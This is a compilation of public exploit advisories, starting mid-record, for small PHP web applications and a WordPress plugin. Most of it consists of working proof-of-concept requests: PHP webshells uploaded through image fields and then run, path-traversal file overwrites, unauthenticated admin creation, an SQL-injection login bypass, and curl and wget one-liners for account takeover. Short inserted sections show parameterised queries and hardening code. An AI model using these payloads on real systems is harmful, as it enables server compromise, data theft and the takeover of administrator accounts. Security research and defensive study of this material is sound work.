Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /traffic_offense/uploads</title>
 </head>
 <body>
<h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a>  </td><td align="right">2021-08-19 09:24  </td><td align="right"> 11K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58  </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a>     </td><td align="right">2021-10-07 07:31  </td><td align="right">3.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a>     </td>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09    <DIR>          .
07.10.2021  10:09    <DIR>          ..
19.08.2021  09:24            11ÿ426 1629336240_avatar.jpg
20.08.2021  08:58             5ÿ288 1629421080_tl-logo.png
07.10.2021  07:31             3ÿ451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02    <DIR>          drivers
               5 File(s)         20ÿ669 bytes
               3 Dir(s)  86ÿ494ÿ085ÿ120 bytes free
</pre>
</BODY></HTML>

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Webshell uploaded as the System Logo and a second webshell as the Portal Cover on the System Information page

# Request

POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

<?php

if($_GET['file']) {
	$fichero=$_GET['file']; 
	} else {
	$fichero="/";
	} 

if($handle = @opendir($fichero)) {
  while($filename = readdir($handle)) {
    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
  closedir($handle);
  } else {
  echo "FILE: " . $fichero . "<br><hr><pre>";
  $fp = fopen($fichero, "r");
  $buffer = fread($fp, filesize($fichero));
  echo $buffer;
  fclose($fp);
  }

?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files were dropped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3

# Webshell uploaded as the photo on the driver list page

# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell

GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<pre>desktop-uhrf0c6\hubert
</pre>
            
# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Mevlüt Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/entrance_exam/admin/login.php
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /entrance_exam/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/entrance_exam/admin/login.php
Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n

username=admin'+or+'1'%3D'1&password=anything
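As an added example (not the project's code), the bypass payload from the steps above run against the two ways the login query can be built: values pasted into the SQL string, and the same query with bound parameters. An in-memory SQLite table stands in for the application's users table; the md5 password hashing mirrors the hashes seen in these advisories.

```python
"""Login-bypass SQLi from this advisory, shown against a concatenated and a parameterised query.

Added example, not the project's code. Uses an in-memory SQLite table as a stand-in
for the application's users table; md5 hashing mirrors the hashes seen in the advisories.
"""
import hashlib
import sqlite3

BYPASS_USERNAME = "admin' or '1'='1"  # the payload from the steps above


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    """Constructed sample users table with one administrator."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", md5("s3cret")))
    return conn


def login_vulnerable(conn, username, password):
    """Values pasted into the SQL string: the pattern behind the advisory.

    With the bypass username the statement becomes
        ... WHERE username = 'admin' or '1'='1' AND password = '<hash>'
    and because AND binds tighter than OR, username = 'admin' alone satisfies it.
    """
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{md5(password)}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    """Same query with bound parameters: the quote in the payload is data, not syntax."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, md5(password))).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(conn, BYPASS_USERNAME, "anything"))
    print("fixed,      bypass payload:", login_fixed(conn, BYPASS_USERNAME, "anything"))
    print("fixed,      real password: ", login_fixed(conn, "admin", "s3cret"))
```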
            
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation

# All requests can be sent by both an authenticated and a non-authenticated user

# The vulnerabilities in the application allow for:

* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files on the server
* Performing operations by an unauthenticated user with application administrator rights

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - Reading any PHP file from the server

Example vuln scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading the rrr.php file belonging to another user on the server

GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
[...]
</br></br>Hacked file other user in serwer!</br></br>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2 - Saving files to parent and child directories and overwriting files in server

# Request to read file 

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
  	<title>Online Traffic Offense Management System - PHP</title>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite the file index.php in the web app's main directory

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

<?php
echo "Hacked other client files in this hosting!";
?>
-----------------------------329606699635951312463334027403--

# The new file gets the extension given in filename="fuzzdb.php"
# The new file's name and location come from the id value 5/../../../index, so we can save the file in another directory ;)
# The id value must start with a digit
# We can overwrite config files

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
# Request to read file index.php again

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!

-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights

# The application allows many operations to be performed without authorization; it has no permission matrix. The entire application is vulnerable.
# Request adding a new admin user to the application, sent without being logged in

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request worked; log into the app using the new hack account
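The three findings above share one root cause: user-controlled strings are used directly as a file path (Example 1), as the name and location of a written file (Example 2), and as a request that no role check guards (Example 4). The following is an added example, not code from the Online Traffic Offense Management System, showing how those three operations can be written so that the exact requests in this advisory are rejected. The directory layout, the page names in the allowlist and the `$_SESSION['type']` role field are assumptions, not values taken from the project.

```php
<?php
declare(strict_types=1);
// Added example, not the Online Traffic Offense Management System's own code.
// Directory names, page names and the $_SESSION['type'] role field are assumptions.

const APP_ROOT   = __DIR__;
const PAGES_DIR  = APP_ROOT . '/pages';            // assumed location of includable pages
const UPLOAD_DIR = APP_ROOT . '/uploads/drivers';  // matches the image_path field in the request
const ALLOWED_PAGES = ['home', 'drivers/manage_driver', 'offenses/list'];  // assumed page names

// Example 1: index.php?p=... may only include a page from a fixed allowlist, and
// the resolved path must still lie inside PAGES_DIR after symlink resolution.
function resolve_page(string $p): ?string
{
    if (!in_array($p, ALLOWED_PAGES, true)) {
        return null;                               // "../phpwcms2/rrr" is not on the list
    }
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $p . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                               // defence in depth against traversal or symlinks
    }
    return $real;
}

// Example 2: the record id must be a plain positive integer (no "5/../../../index"),
// the stored file name is built by the server, and the extension comes from the
// sniffed image type, never from the client's filename or Content-Type.
function safe_upload_target(string $id, array $file): ?string
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $id)) {
        return null;
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg'];
    $info = @getimagesize($file['tmp_name']);      // reads the magic bytes of the real content
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;                               // "<?php ..." labelled image/png stops here
    }
    return UPLOAD_DIR . '/' . $id . '.' . $allowed[$info[2]];
}

// Example 4: every classes/*.php action verifies an admin session before doing anything.
// type=1 is the admin role used in the request above; storing it in the session is assumed.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if ((int)($_SESSION['type'] ?? 0) !== 1) {
        http_response_code(403);
        echo json_encode(['status' => 'failed', 'msg' => 'Login required.']);
        exit;
    }
}

// Handler for classes/Master.php?f=save_driver wired to the checks above.
function save_driver(): void
{
    require_admin();
    $target = safe_upload_target((string)($_POST['id'] ?? ''), $_FILES['img'] ?? []);
    if ($target === null || !move_uploaded_file($_FILES['img']['tmp_name'], $target)) {
        echo json_encode(['status' => 'failed']);
        return;
    }
    echo json_encode(['status' => 'success']);
}
```

The allowlist check in `resolve_page()` is what actually stops Example 1; the `realpath()` prefix comparison is kept as a second layer because an allowlist entry could itself point at a symlink. In `safe_upload_target()` the client's `filename` and `Content-Type` are never consulted, so the `fuzzdb.php` upload fails on the image sniff regardless of the `id` value.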
            
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated admin creation

Unauthenticated admin creation:
    
    Request:
        POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
        Host: 127.0.0.1
        Content-Length: 42

        id=&fullname=admin2&username=admin2&type=1

    PoC to create an admin user named exploitdb and password exploitdb:
    curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
            
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentication cookies for user 1 (admin).

Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
            
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated password change leading to account takeover

Explanation: by passing the old_password parameter as an array, md5() returns null, and $_SESSION['password'] is also null because we have no session, so md5($old_password) == $_SESSION['password'] holds and the check is bypassed. After that, the UPDATE statement is built from the POST keys and values without escaping, so we can use SQL injection through the username field to set our own data.
    
    Request:
        POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 129

        id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test

    Vulnerable code in Actions.php:
        function update_credentials(){
            extract($_POST);
            $data = "";
            foreach($_POST as $k => $v){
                if(!in_array($k,array('id','old_password')) && !empty($v)){
                    if(!empty($data)) $data .= ",";
                    if($k == 'password') $v = md5($v);
                    $data .= " `{$k}` = '{$v}' ";
                }
            }
            ...
            if(!empty($password) && md5($old_password) != $_SESSION['password']){
                $resp['status'] = 'failed';
                $resp['msg'] = "Old password is incorrect.";
            }else{
                $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
                @$save = $this->query($sql);

    PoC that changes the password and username of user 'admin' to 'exploitdb':
        curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
